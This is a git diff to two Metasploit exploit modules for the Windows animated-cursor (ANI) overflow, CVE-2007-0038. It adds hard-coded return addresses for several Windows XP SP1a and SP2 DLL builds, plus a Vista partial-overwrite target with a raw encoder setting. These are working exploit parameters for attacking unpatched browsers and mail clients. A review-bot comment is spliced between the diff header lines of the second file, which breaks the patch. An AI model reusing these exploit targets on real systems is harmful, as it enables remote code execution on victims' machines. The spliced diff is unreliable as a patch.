diff --git a/modules/exploits/windows/browser/ani_loadimage_chunksize.rb b/modules/exploits/windows/browser/ani_loadimage_chunksize.rb
index 967e04ffd7..313ff4a496 100644
--- a/modules/exploits/windows/browser/ani_loadimage_chunksize.rb
+++ b/modules/exploits/windows/browser/ani_loadimage_chunksize.rb
@@ -96,16 +96,37 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
 
 					# Should work for English 2000 SP0-SP4+
 					[ 'Windows 2000 SP0-SP4 netui2.dll English', { 'Ret' => 0x75116d88 }],
-
-
+
 					#
 					# Partial overwrite where 700b is a jmp dword [ebx] ebx points to the start
 					# of the RIFF chunk itself. The length field of the RIFF chunk
 					# tag contains a short jump into an embedded riff chunk that
 					# makes a long relative jump into the actual payload.
 					#
-					[ 'Windows Vista user32.dll 6.0.6000.16386', { 'Ret' => 0x700b, 'Len' => 2 } ]
-
+					[ 'Windows Vista user32.dll 6.0.6000.16386',
+						{
+							'Ret' => 0x700b,
+							'Len' => 2,
+
+							# On Vista, the pages that contain the RIFF are read-only.
+							# In-place decoders cannot be used.
+							'Payload' => { 'EncoderType' => Msf::Encoder::Type::Raw }
+						}
+					],
+
+					#
+					# Supplied by ramon[at]risesecurity.org
+					#
+
+					# call [ebx+4]
+					[ 'Windows XP SP2 user32.dll (5.1.2600.2180) Multi Language', { 'Ret' => 0x25d0, 'Len' => 2 }],
+					[ 'Windows XP SP2 userenv.dll English', { 'Ret' => 0x769fc81a }],
+					[ 'Windows XP SP2 user32.dll (5.1.2600.2180) English', { 'Ret' => 0x77d825d0 }],
+					[ 'Windows XP SP2 userenv.dll Portuguese (Brazil)', { 'Ret' => 0x769dc81a }],
+
+					# call [esi+4]
+					[ 'Windows XP SP1a userenv.dll English', { 'Ret' => 0x75a758b1 }],
+					[ 'Windows XP SP1a shell32.dll English', { 'Ret' => 0x77441a66 }]
 				],
 			'DisclosureDate' => 'Mar 28 2007',
 			'DefaultTarget' => 0))
diff --git a/modules/exploits/windows/email/ani_loadimage_chunksize.rb b/modules/exploits/windows/email/ani_loadimage_chunksize.rb
index 8040595850..cca30c2a00 100644
--- a/modules/exploits/windows/email/ani_loadimage_chunksize.rb
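Review bot: The six new XP target entries and the expanded Vista entry at the end of this hunk are duplicated verbatim in modules/exploits/windows/email/ani_loadimage_chunksize.rb (its second hunk), so every future address correction or change to the Vista `'Payload'` encoder setting has to be made in two places; a shared constant or mixin holding the target table, or failing that a comment above each list saying the two must stay in sync, would remove that maintenance risk. The `'Len' => 2` on the XP SP2 Multi Language entry presumably marks it as the same two-byte partial overwrite the Vista comment explains, but nothing next to it says so; a comment such as `# two-byte partial overwrite, see the Vista entry above` on that line would make the intent explicit. The userenv.dll and shell32.dll entries name only the service pack and language, while the user32.dll entries also record the DLL build (5.1.2600.2180); a hard-coded `'Ret'` is tied to one build, so the target names should carry it too. The array literal these entries belong to, and the method call enclosing it, start before the hunk.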
+++ b/modules/exploits/windows/email/ani_loadimage_chunksize.rb
@@ -94,9 +94,8 @@ class Exploits::Windows::Email::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
 					[ 'Windows XP SP0/SP1 netui2.dll English', { 'Ret' => 0x71bd0205 }],
 
 					# Should work for English 2000 SP0-SP4+
-					[ 'Windows 2000 SP0-SP4 netui2.dll English', { 'Ret' => 0x75116d88 }],
-
-
+					[ 'Windows 2000 SP0-SP4 netui2.dll English', { 'Ret' => 0x75116d88 }],
+
 					#
 					# Partial overwrite where 700b is a jmp dword [ebx] ebx points to the start
 					# of the RIFF chunk itself. The length field of the RIFF chunk
@@ -112,7 +111,21 @@ class Exploits::Windows::Email::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
 							# In-place decoders cannot be used.
 							'Payload' => { 'EncoderType' => Msf::Encoder::Type::Raw }
 						}
-					]
+					],
+
+					#
+					# Supplied by ramon[at]risesecurity.org
+					#
+
+					# call [ebx+4]
+					[ 'Windows XP SP2 user32.dll (5.1.2600.2180) Multi Language', { 'Ret' => 0x25d0, 'Len' => 2 }],
+					[ 'Windows XP SP2 userenv.dll English', { 'Ret' => 0x769fc81a }],
+					[ 'Windows XP SP2 user32.dll (5.1.2600.2180) English', { 'Ret' => 0x77d825d0 }],
+					[ 'Windows XP SP2 userenv.dll Portuguese (Brazil)', { 'Ret' => 0x769dc81a }],
+
+					# call [esi+4]
+					[ 'Windows XP SP1a userenv.dll English', { 'Ret' => 0x75a758b1 }],
+					[ 'Windows XP SP1a shell32.dll English', { 'Ret' => 0x77441a66 }]
 				],
 			'DisclosureDate' => 'Mar 28 2007',
 			'DefaultTarget' => 0))